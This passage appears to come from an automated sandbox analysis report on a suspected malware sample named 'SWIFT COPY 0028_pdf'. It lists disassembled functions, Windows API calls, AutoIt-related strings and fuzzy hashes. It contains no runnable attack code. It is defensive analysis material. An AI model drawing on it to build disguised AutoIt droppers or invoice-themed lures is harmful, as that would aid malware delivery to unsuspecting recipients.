                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 5ae03c05b71313ffa74fe798a73c23836b22cc289e26d07084fb7ccadc926520
                                                                                    • Instruction ID: 6078450146aa6f314b7ee649b747dea21d372744fcf86a3c8dad1f7db5ca591e
                                                                                    • Opcode Fuzzy Hash: 5ae03c05b71313ffa74fe798a73c23836b22cc289e26d07084fb7ccadc926520
                                                                                    • Instruction Fuzzy Hash: 5DB1A171608311AFDB04EFA4D988B5AFBE4FF89310F10891DF59A9B291D771E804CB92
                                                                                    Function 00966CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00966CFB
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00966D21
                                                                                    • _wcscpy.LIBCMT ref: 00966D4F
                                                                                    • _wcscmp.LIBCMT ref: 00966D5A
                                                                                    • _wcscat.LIBCMT ref: 00966D70
                                                                                    • _wcsstr.LIBCMT ref: 00966D7B
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00966D97
                                                                                    • _wcscat.LIBCMT ref: 00966DE0
                                                                                    • _wcscat.LIBCMT ref: 00966DE7
                                                                                    • _wcsncpy.LIBCMT ref: 00966E12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 699586101-1459072770
                                                                                    • Opcode ID: a9dd672ed10ca5449f6079a963a3f4bcc92325f6a288ef7c14470a3440930832
                                                                                    • Instruction ID: 13c9f83035b3e071a75665d59df2262b45ad1f82a9638bebcda714c9c7318b39
                                                                                    • Opcode Fuzzy Hash: a9dd672ed10ca5449f6079a963a3f4bcc92325f6a288ef7c14470a3440930832
                                                                                    • Instruction Fuzzy Hash: 7C41F672A40201BBEB01AB64DD47FBF777CEFC1714F04406AF905A2182EB75DA01D6A6
                                                                                    Function 0093A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0093A939
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 0093A941
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0093A96C
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0093A974
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0093A999
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0093A9B6
                                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0093A9C6
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0093A9F9
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0093AA0D
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0093AA2B
                                                                                    • GetStockObject.GDI32(00000011), ref: 0093AA47
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0093AA52
                                                                                      • Part of subcall function 0093B63C: GetCursorPos.USER32(000000FF), ref: 0093B64F
                                                                                      • Part of subcall function 0093B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0093B66C
                                                                                      • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000001), ref: 0093B691
                                                                                      • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000002), ref: 0093B69F
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,0093AB87), ref: 0093AA79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: 2dc4ec613e444695f053fd5e56dc98ad4ed2985436264433059837c60028d1ea
                                                                                    • Instruction ID: 213e86630842a4cbac931dc29d287fc4a1cd1f6b89a8d5cff4f7424dc6e5c6de
                                                                                    • Opcode Fuzzy Hash: 2dc4ec613e444695f053fd5e56dc98ad4ed2985436264433059837c60028d1ea
                                                                                    • Instruction Fuzzy Hash: BDB17971A0520AAFDB14DFA8CC85BAE7BB8FF08714F114229FA56E7290DB349840DF51
                                                                                    Function 00922EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Foreground
                                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                    • API String ID: 62970417-1919597938
                                                                                    • Opcode ID: 658a2c1af259efe3be3208d5af1ac30348b113aaad3412e3f7be9ebc63b95acd
                                                                                    • Instruction ID: c3bb7e7aa2fb25ee972a80caccbcc028b69cfe7a9624e98e739812e58f2202f7
                                                                                    • Opcode Fuzzy Hash: 658a2c1af259efe3be3208d5af1ac30348b113aaad3412e3f7be9ebc63b95acd
                                                                                    • Instruction Fuzzy Hash: 50D1D730108742BBCF18EF24D481AAEBBB4BF94344F104A19F496675A1DB34E99ACFD1
                                                                                    Function 00983639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00983735
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,009BDC00,00000000,?,00000000,?,?), ref: 009837A3
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009837EB
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00983874
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00983B94
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00983BA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: 6b52242e87c9d693fb56d1eab569420f908d7462b90091fbb841fcbbc03dce51
                                                                                    • Instruction ID: 4ea7480bf8b1b1c4d76b494bce7bf6a6894487baaa117e7a885661620a9678a3
                                                                                    • Opcode Fuzzy Hash: 6b52242e87c9d693fb56d1eab569420f908d7462b90091fbb841fcbbc03dce51
                                                                                    • Instruction Fuzzy Hash: F50249752046119FCB14EF24D895E2AB7E9FF89720F04895DF98A9B3A1CB34ED01CB85
                                                                                    Function 00986BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00986C56
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00986D16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 3974292440-719923060
                                                                                    • Opcode ID: ff5abc1429e67c348cca521e9c3f5cdcdd6f5d4f23990703da7faf9824deebbb
                                                                                    • Instruction ID: 2d7e5b74a922a0c13d22ce3a14cd29f8ccf8fc1fdd48944ad9271d3c17cc5886
                                                                                    • Opcode Fuzzy Hash: ff5abc1429e67c348cca521e9c3f5cdcdd6f5d4f23990703da7faf9824deebbb
                                                                                    • Instruction Fuzzy Hash: 8FA159302043419BCB14FF24D951B6AB3A5BF84314F14896DF9A6AB3D6DB34ED0ACB91
                                                                                    Function 0095CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0095CF91
                                                                                    • __swprintf.LIBCMT ref: 0095D032
                                                                                    • _wcscmp.LIBCMT ref: 0095D045
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0095D09A
                                                                                    • _wcscmp.LIBCMT ref: 0095D0D6
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0095D10D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0095D15F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0095D195
                                                                                    • GetParent.USER32(?), ref: 0095D1B3
                                                                                    • ScreenToClient.USER32(00000000), ref: 0095D1BA
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0095D234
                                                                                    • _wcscmp.LIBCMT ref: 0095D248
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0095D26E
                                                                                    • _wcscmp.LIBCMT ref: 0095D282
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3119225716-679674701
                                                                                    • Opcode ID: 00f0345cba93144dc289929d88e6cb539735fab922dc18b9cd3c3bb91207b422
                                                                                    • Instruction ID: 9601c25efff83b1e075f188ad2ac48775d7be9d3d6181b0a6a403d0f9375703c
                                                                                    • Opcode Fuzzy Hash: 00f0345cba93144dc289929d88e6cb539735fab922dc18b9cd3c3bb91207b422
                                                                                    • Instruction Fuzzy Hash: FFA1D171209706AFD728DF65C884FAAB7ACFF44355F008519FDAAD2190DB30EA49CB91
                                                                                    Function 0095D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0095D8EB
                                                                                    • _wcscmp.LIBCMT ref: 0095D8FC
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0095D924
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0095D941
                                                                                    • _wcscmp.LIBCMT ref: 0095D95F
                                                                                    • _wcsstr.LIBCMT ref: 0095D970
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0095D9A8
                                                                                    • _wcscmp.LIBCMT ref: 0095D9B8
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0095D9DF
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0095DA28
                                                                                    • _wcscmp.LIBCMT ref: 0095DA38
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0095DA60
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0095DAC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: 39cf44c8a8c56bf54c44251e0ee7f83dbfba3daf9efdf32a3c3577c82af71081
                                                                                    • Instruction ID: 4c28c45c90ef69e4054276d1547bb4483fcfeefa644c3ec1c878895bd37fecc0
                                                                                    • Opcode Fuzzy Hash: 39cf44c8a8c56bf54c44251e0ee7f83dbfba3daf9efdf32a3c3577c82af71081
                                                                                    • Instruction Fuzzy Hash: A881D27100A3059BDB25DF11D881FAA7BECFF84315F04846AFD8A9A096DB30DD49CBA1
                                                                                    Function 0095D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: 3d06d2aac68671e892683190ed3cb9033add7802e0dcd9c3c9ee3443ecc5bda6
                                                                                    • Instruction ID: c525aa41851ccf15c94de3bdc6d08c708f11e3024161921f7df45927c6341293
                                                                                    • Opcode Fuzzy Hash: 3d06d2aac68671e892683190ed3cb9033add7802e0dcd9c3c9ee3443ecc5bda6
                                                                                    • Instruction Fuzzy Hash: 6F31DE31A84204EADB24EB61ED43FADB3789FA0305F20016AF941B21D5EBA5AE08C751
                                                                                    Function 0095EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000063), ref: 0095EAB0
                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0095EAC2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0095EAD9
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0095EAEE
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0095EAF4
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0095EB04
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0095EB0A
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0095EB2B
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0095EB45
                                                                                    • GetWindowRect.USER32(?,?), ref: 0095EB4E
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0095EBB9
                                                                                    • GetDesktopWindow.USER32 ref: 0095EBBF
                                                                                    • GetWindowRect.USER32(00000000), ref: 0095EBC6
                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0095EC12
                                                                                    • GetClientRect.USER32(?,?), ref: 0095EC1F
                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0095EC44
                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0095EC6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                    • String ID:
                                                                                    • API String ID: 3869813825-0
                                                                                    • Opcode ID: d14533ecd5367493ca63a810c218e50bca1c8dd4f7619f0c54e1c703b7e614c2
                                                                                    • Instruction ID: 802a4553406f98da7b65ac43ba5f053c1d3e018188fcb5b17ca38d101b6aec91
                                                                                    • Opcode Fuzzy Hash: d14533ecd5367493ca63a810c218e50bca1c8dd4f7619f0c54e1c703b7e614c2
                                                                                    • Instruction Fuzzy Hash: 78515D71900709AFDB24DFA9CD89F6EBBF9FF04706F004928E587A25A0C775A948DB50
                                                                                    Function 009779B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 009779C6
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 009779D1
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 009779DC
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 009779E7
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 009779F2
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 009779FD
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00977A08
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00977A13
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00977A1E
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00977A29
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00977A34
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00977A3F
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00977A4A
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00977A55
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00977A60
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00977A6B
                                                                                    • GetCursorInfo.USER32(?), ref: 00977A7B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: 3c7eaa32f992d8d5e72369b402b6924049588662ffa8b2efcd8bbd867178629d
                                                                                    • Instruction ID: ac911d9bec1d49c0e52dc4d4e3545585d201ab310a84b9892f292815a60d5236
                                                                                    • Opcode Fuzzy Hash: 3c7eaa32f992d8d5e72369b402b6924049588662ffa8b2efcd8bbd867178629d
                                                                                    • Instruction Fuzzy Hash: B431D2B1D4831A6ADB509FB68C8999FFEECFF04750F50452AE54DE7280DA78A5008FA1
                                                                                    Function 0092C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0092C8B7,?,00002000,?,?,00000000,?,0092419E,?,?,?,009BDC00), ref: 0093E984
                                                                                      • Part of subcall function 0092660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009253B1,?,?,009261FF,?,00000000,00000001,00000000), ref: 0092662F
                                                                                    • __wsplitpath.LIBCMT ref: 0092C93E
                                                                                      • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
                                                                                    • _wcscpy.LIBCMT ref: 0092C953
                                                                                    • _wcscat.LIBCMT ref: 0092C968
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0092C978
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0092CABE
                                                                                      • Part of subcall function 0092B337: _wcscpy.LIBCMT ref: 0092B36F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 2258743419-1018226102
                                                                                    • Opcode ID: 28fcdc0208849541c548aead50f2987dadbf2e8538ec68d31c6c5593507ad6ac
                                                                                    • Instruction ID: 3baca65f78783e929f4d6fedf219ea249a0a0e250a69857f947df17c71298244
                                                                                    • Opcode Fuzzy Hash: 28fcdc0208849541c548aead50f2987dadbf2e8538ec68d31c6c5593507ad6ac
                                                                                    • Instruction Fuzzy Hash: 0712AF715083419FCB24EF24D891AAFBBE9BFD9304F40491EF58A93261DB30DA49CB52
                                                                                    Function 0098CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0098CEFB
                                                                                    • DestroyWindow.USER32(?,?), ref: 0098CF73
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0098CFF4
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0098D016
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098D025
